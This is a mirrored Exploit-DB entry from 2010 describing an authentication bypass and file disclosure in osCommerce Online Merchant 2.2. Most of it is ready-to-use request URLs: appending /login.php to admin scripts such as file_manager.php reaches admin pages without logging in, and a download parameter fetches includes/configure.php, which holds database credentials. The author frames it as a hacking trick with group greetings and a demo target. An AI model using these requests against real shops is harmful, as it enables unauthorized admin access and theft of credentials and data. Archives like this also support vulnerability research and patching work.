bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/12801.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

49 lines
No EOL
1.4 KiB
Text
Raw Permalink Blame History

--------------------------------------------
Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass
--------------------------------------------
Author : Flyff666
Date : May, 30, 2010
Location : Tangerang, Indonesia
Time Zone : GMT +7:00
Software : OsCommerce Online Merchant v2.2
Tested on : All OS
--------------------------------------------
Email : Dream_Theatre@rocketmail.com
gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR
WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be
Spykit, BobyHikaru, Fribo. all member.
Site : Http://www.Devilzc0de.org/forum/
Forum : Http://Indonesianhacker.or.id/
--------------------------------------------
# ByPass Page Admin :
You can use this Trick if admin folder not protected by .htaccess
if you Want to explore admin page without login. You can use /login.php behind the name of the file
Example :
http://[site]/admin/backup.php/login.php
or
http://[site]/admin/file_manager.php/login.php
Demo :
http://server/store/admin/file_manager.php/login.php
You can See all file in Directory Oscommerce.. haha ;)
and you can download all file with tRick above
# File Disclosure :
in : admin/file_manager.php/login.php?action=download&filename=
Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
Reference in a new issue View git blame Copy permalink